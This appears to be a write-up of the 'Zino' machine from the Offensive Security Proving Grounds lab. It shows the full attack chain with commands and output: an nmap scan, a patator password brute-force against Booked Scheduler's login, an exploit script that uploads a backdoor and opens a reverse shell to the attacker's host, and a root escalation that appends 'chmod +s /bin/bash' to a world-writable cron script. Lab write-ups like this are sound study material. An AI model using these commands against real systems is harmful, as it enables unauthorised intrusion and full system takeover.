Zino - OSPG
Summary Of Result
We exploit the vulnerable Booked Scheduler CMS to obtain the initial access. We then escalate our privilege through a crontab service that will execute a python file of our control.
Attack Narrative
The attack is mounted in three main phases:
- Enumeration.
- Exploitation.
- Privilege Escalation.
Enumeration
Nmap
We will start with a nmap scan:
$ sudo nmap --open -sV -A -p- -vv -n -Pn $IP
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 63 vsftpd 3.0.3
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 b2:66:75:50:1b:18:f5:e9:9f:db:2c:d4:e3:95:7a:44 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC44YysvRUv+02vB7LK+DbEvDnTUU2Zzaj42pbyX7gL4I5DhhWWZmK4Sr/MulEE2XPnKhXCCwTVuA12C/VuFhVdnq7WjDwfV+4a1DEuDG8P7wQAux0waAsly34mGtd7HQhQIv9h7nQWcTx8hoOrF6D71eHiZmLJ6fk01VlFN75XKJGn/T/ClJHz9UJ33zwkhqXskMO9At21LfOBE+I3IQCHuFFO6DcQWw/SsZaXQxHNzLqnI/9j1aQuvyuh6KMdT6p10D577maBz+T+Hyq/qeOgbGU0YGAoXXMU36FibkoQ+WwDRYbEHYKJccUXhzFWp980PYCIDtZNaWuo/AbgryLB
| 256 91:2d:26:f1:ba:af:d1:8b:69:8f:81:4a:32:af:9c:77 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOmcORNC6GjDnH1cqJrCeytZJjGrpJyY+CgseFsH27PJmSbmVYEz0ls0w/oXR0xrG/IfvxxyH9RRX2BIsBTx2cY=
| 256 ec:6f:df:8b:ce:19:13:8a:52:57:3e:72:a3:14:6f:40 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIP9wfKL6wusRXGDMv5Tcf2OxMAIkhvOofRPsrSQ+aMbK
139/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
3306/tcp open mysql? syn-ack ttl 63
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, Help, JavaRMI, NULL, RPCCheck, SSLSessionReq, WMSRequest, oracle-tns:
|_ Host '192.168.49.156' is not allowed to connect to this MariaDB server
| mysql-info:
|_ MySQL Error: Host '192.168.49.156' is not allowed to connect to this MariaDB server
8003/tcp open http syn-ack ttl 63 Apache httpd 2.4.38
| http-ls: Volume /
| SIZE TIME FILENAME
| - 2019-02-05 21:02 booked/
|_
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Index of /
- We are particularly interested in the HTTP service running on port 8003.
HTTP Service - Port 8003
Lets us navigate to the website:
$ curl -s http://192.168.175.64:8003 | html2text
****** Index of / ******
[[ICO]] Name Last_modified Size Description
===========================================================================
**[[DIR]] booked/ 2019-02-05 21:02 -**
===========================================================================
Apache/2.4.38 (Debian) Server at 192.168.175.64 Port 8003
Clicked on the booked, the website redirects us to a new directory - /Web/index.php
$ curl -s http://192.168.156.64:8003/booked/Web/index.php | html2text
Toggle navigation [Booked_Scheduler_-_Log_In]
* Schedule
o View_Schedule
o View_Calendar
* Help
o Help
o About
* Log_In
[Booked Scheduler - Log In]
[email ]
[********************]
Log In
⁰ Remember Me
[...]
**Booked Scheduler v2.7.5**
The website seems it’s running Book Scheduler version 2.7.5.
Conducting a few investigation, we discover that our target is running a vulnerable CMS. Sucessful exploitation will lead to Remote Code Execution.
$ searchsploit Booked Scheduler
---------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Booked Scheduler 2.7.5 - Remote Command Execution (Metasploit) | php/webapps/46486.rb
Booked Scheduler 2.7.7 - Authenticated Directory Traversal | php/webapps/48428.txt
---------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
However, we need to note that the prerequiste for this exploit to work is a valid admin credentials.
Admin Credentials Attack
To mount a dictionary attack against admin user, we use patator, the username is admin and the password dictionary is best1050.txt from seclists.
Our command is as follow:
$ patator http_fuzz url=http://192.168.156.64:8003/booked/Web/index.php method=POST body='email=admin&password=FILE0&captcha=&login=submit&resume=&language=en_us' 0=/usr/share/seclists/Passwords/Common-Credentials/best1050.txt follow=1 -x ignore:fgrep='could not match'
02:54:48 patator INFO - Starting Patator 0.9 (https://github.com/lanjelot/patator) with python-3.9.2 at 2021-08-15 02:54 EDT
02:54:48 patator INFO -
02:54:48 patator INFO - code size:clen time | candidate | num | mesg
02:54:48 patator INFO - -----------------------------------------------------------------------------
02:54:53 patator INFO - 200 13017:-1 1.005 | adminadmin | 118 | HTTP/1.1 200 OK
02:55:23 patator INFO - Hits/Done/Skip/Fail/Size: 1/1049/0/0/1049, Avg: 29 r/s, Time: 0h 0m 35s
After a few second, patator yielded adminadmin as our admin password.
Exploitation
Booked Scheduler File Upload
Since we have admin credentials, we can use any public exploit to obtain reverse shell or via Metasploit, but since Metasploit is really unstable, we can also choose to manually exploit it.
- PoC can be found here.
(The below exploit script I used can be found here.)
- On our terminal, execute:
$ python3 booked_scheduler.py --url http://192.168.156.64:8003/booked/Web -u admin -p adminadmin -P 21 -H 192.168.49.156 [*] Checking host: http://192.168.156.64:8003/booked/Web [+] Checking version Booked Scheduler v2.7.5: VULNERABLE !!! [*] Checking credentials: admin:adminadmin [+] Successfully logged in !. [*] Grabing token: YjEzYzQ4NzIxMWZmMTU2MTU5N2NlMGM4NmI4MGJlMTE= [*] Uploading backdoor shell... [+] Trying to bind to :: on port 21: Done [*] Triggering the shell ... [+] Waiting for connections on :::21: Got connection from ::ffff:192.168.156.64 on port 58506 [*] Switching to interactive mode bash: cannot set terminal process group (561): Inappropriate ioctl for device bash: no job control in this shell www-data@zino:/var/www/html/booked/Web$ $ www-data@zino:/var/www/html/booked$ $ id id uid=33(www-data) gid=33(www-data) groups=33(www-data)
Our listener caught the reverse shell at port 21 as www-data user.
Privilege Escalation
Crontab
Local enumeration divulges an interesting crontab service.
www-data@zino:/home/peter$ $ cat /etc/crontab
[...]
*/3 * * * * root python /var/www/html/booked/cleanup.py
The /var/www/html/booked/cleanup.py file is executed steadily every 3 minutes as root. More importantly, the file is also modificable by everyone.
www-data@zino:/home/peter$ $ ls -al /var/www/html/booked/cleanup.py
ls -al /var/www/html/booked/cleanup.py
-rwxrwxrwx 1 www-data www-data 164 Apr 28 2020 /var/www/html/booked/cleanup.py
At this point, we can inject an arbitrary command requesting root to set a SUID sticky bit to the /bin/bash executable.
www-data@zino:/var/www/html/booked$ $ echo "os.system('chmod +s /bin/bash')" >> /var/www/html/booked/cleanup.py
If eveything works properly, after three minutes, we should be able to execute the /bin/bash with root privilege …
www-data@zino:/var/www/html/booked$ $ /bin/bash -p
/bin/bash -p
$ whoami
root
and become root!.